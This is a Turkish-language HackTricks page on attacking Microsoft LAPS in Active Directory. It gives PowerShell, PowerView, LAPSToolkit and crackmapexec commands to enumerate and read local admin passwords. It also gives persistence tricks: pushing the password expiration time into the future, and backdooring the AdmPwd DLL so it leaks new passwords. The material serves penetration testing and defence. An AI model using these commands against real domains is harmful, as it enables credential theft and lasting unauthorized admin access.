htARTE (HackTricks AWS Red Team Expert) ile sıfırdan kahramana kadar AWS hacklemeyi öğrenin!
Bir siber güvenlik şirketinde mi çalışıyorsunuz? Şirketinizin HackTricks'te reklamını görmek ister misiniz? Ya da en son PEASS sürümüne erişmek veya HackTricks'i PDF olarak indirmek ister misiniz?ABONELİK PLANLARI'na göz atın!
Yerel Yönetici Parola Çözümü (LAPS), yönetici parolalarının, benzersiz, rastgele ve sık sık değiştirilen şekilde uygulandığı, etki alanına katılmış bilgisayarları yönetmek için kullanılan bir araçtır. Bu parolalar, Active Directory içinde güvenli bir şekilde depolanır ve yalnızca Erişim Kontrol Listeleri (ACL'ler) aracılığıyla izin verilen kullanıcılar tarafından erişilebilir. İstemci ile sunucu arasındaki parola iletimlerinin güvenliği, Kerberos sürüm 5 ve Gelişmiş Şifreleme Standardı (AES) kullanılarak sağlanır.
LAPS'ın uygulanmasıyla etki alanının bilgisayar nesnelerinde, iki yeni özellik eklenir: ms-mcs-AdmPwd ve ms-mcs-AdmPwdExpirationTime. Bu özellikler, sırasıyla düz metin yönetici parolasını ve son kullanma zamanını depolar.
Aktif olup olmadığını kontrol edin
regquery"HKLM\Software\Policies\Microsoft Services\AdmPwd"/vAdmPwdEnableddir"C:\Program Files\LAPS\CSE"# Check if that folder exists and contains AdmPwd.dll# Find GPOs that have "LAPS" or some other descriptive term in the nameGet-DomainGPO|?{ $_.DisplayName-like"*laps*"}|select DisplayName, Name, GPCFileSysPath |fl# Search computer objects where the ms-Mcs-AdmPwdExpirationTime property is not null (any Domain User can read this property)
Get-DomainObject -SearchBase "LDAP://DC=sub,DC=domain,DC=local" | ? { $_."ms-mcs-admpwdexpirationtime" -ne $null } | select DnsHostname
LAPS Şifre Erişimi
\\dc\SysVol\domain\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol adresinden LAPS politikasının ham halini indirebilirsiniz ve ardından bu dosyayı insan tarafından okunabilir formata dönüştürmek için GPRegistryPolicyParser paketinde bulunan Parse-PolFile kullanılabilir.
Ayrıca, yerel LAPS PowerShell cmdlet'leri yüklü ise erişim sağladığımız bir makinede kullanılabilir:
Get-Command*AdmPwd*CommandType Name Version Source----------------------------Cmdlet Find-AdmPwdExtendedRights5.0.0.0 AdmPwd.PSCmdlet Get-AdmPwdPassword5.0.0.0 AdmPwd.PSCmdlet Reset-AdmPwdPassword5.0.0.0 AdmPwd.PSCmdlet Set-AdmPwdAuditing5.0.0.0 AdmPwd.PSCmdlet Set-AdmPwdComputerSelfPermission5.0.0.0 AdmPwd.PSCmdlet Set-AdmPwdReadPasswordPermission5.0.0.0 AdmPwd.PSCmdlet Set-AdmPwdResetPasswordPermission5.0.0.0 AdmPwd.PSCmdlet Update-AdmPwdADSchema5.0.0.0 AdmPwd.PS# List who can read LAPS password of the given OUFind-AdmPwdExtendedRights-Identity Workstations | fl# Read the passwordGet-AdmPwdPassword-ComputerName wkstn-2| fl
PowerView ayrıca kimin şifreyi okuyabileceğini ve okuyabileceğini bulmak için kullanılabilir:
# Find the principals that have ReadPropery on ms-Mcs-AdmPwdGet-AdmPwdPassword-ComputerName wkstn-2| fl# Read the passwordGet-DomainObject-Identity wkstn-2-Properties ms-Mcs-AdmPwd
LAPSToolkit
LAPSToolkit, LAPS'ın çeşitli işlevlerle numaralandırılmasını kolaylaştırır.
Bunlardan biri, LAPS etkinleştirilmiş tüm bilgisayarlar için ExtendedRights'ın ayrıştırılmasıdır. Bu, genellikle korunan gruplardaki kullanıcılar olan LAPS şifrelerini okuma yetkisine sahip grupları gösterecektir.
Bir hesap, bir bilgisayarı bir etki alanına katıldığında, o makine üzerinde Tüm Extended Rights alır ve bu hak, hesaba şifreleri okuma yeteneği verir. Numaralandırma, bir kullanıcı hesabının bir makinedeki LAPS şifresini okuyabilen bir hesabı gösterebilir. Bu, bize LAPS şifrelerini okuyabilen belirli AD kullanıcılarını hedeflemede yardımcı olabilir.
# Get groups that can read passwordsFind-LAPSDelegatedGroupsOrgUnit Delegated Groups-----------------------OU=Servers,DC=DOMAIN_NAME,DC=LOCAL DOMAIN_NAME\Domain AdminsOU=Workstations,DC=DOMAIN_NAME,DC=LOCAL DOMAIN_NAME\LAPS Admin# Checks the rights on each computer with LAPS enabled for any groups# with read access and users with "All Extended Rights"Find-AdmPwdExtendedRightsComputerName Identity Reason--------------------------MSQL01.DOMAIN_NAME.LOCAL DOMAIN_NAME\Domain Admins DelegatedMSQL01.DOMAIN_NAME.LOCAL DOMAIN_NAME\LAPS Admins Delegated# Get computers with LAPS enabled, expirations time and the password (if you have access)Get-LAPSComputersComputerName Password Expiration------------------------------DC01.DOMAIN_NAME.LOCAL j&gR+A(s976Rf%12/10/202213:24:41
Crackmapexec ile LAPS Şifrelerinin Sızdırılması
Eğer bir PowerShell erişimi yoksa, bunu uzaktan LDAP aracılığıyla istismar edebilirsiniz.
crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps
LAPS Kalıcılığı
Son Kullanma Tarihi
Yönetici olduktan sonra, şifreleri almak ve bir makinenin şifresini güncellemesini engellemek için son kullanma tarihini geleceğe ayarlamak mümkündür.
# Get expiration timeGet-DomainObject-Identity computer-21-Properties ms-mcs-admpwdexpirationtime# Change expiration time## It's needed SYSTEM on the computerSet-DomainObject-Identity wkstn-2-Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}
Şifre hala sıfırlanacak, eğer bir yöneticiReset-AdmPwdPassword komut dosyasını kullanırsa; veya Politika tarafından gerekliden daha uzun şifre süresine izin verme LAPS GPO'da etkinleştirilmişse.
Arka Kapı
LAPS için orijinal kaynak kodu burada bulunabilir, bu nedenle kod içine (örneğin Main/AdmPwd.PS/Main.cs içindeki Get-AdmPwdPassword yöntemine) bir arka kapı yerleştirmek mümkündür ve bu şekilde yeni şifreleri dışarı çıkarabilir veya bir yerde depolayabilir.
Ardından, yeni AdmPwd.PS.dll dosyasını derleyin ve C:\Tools\admpwd\Main\AdmPwd.PS\bin\Debug\AdmPwd.PS.dll konumuna yükleyin (ve değişiklik zamanını değiştirin).
Bir siber güvenlik şirketinde mi çalışıyorsunuz? Şirketinizi HackTricks'te reklamını görmek ister misiniz? veya PEASS'ın en son sürümüne erişmek veya HackTricks'i PDF olarak indirmek ister misiniz? ABONELİK PLANLARI'na göz atın!
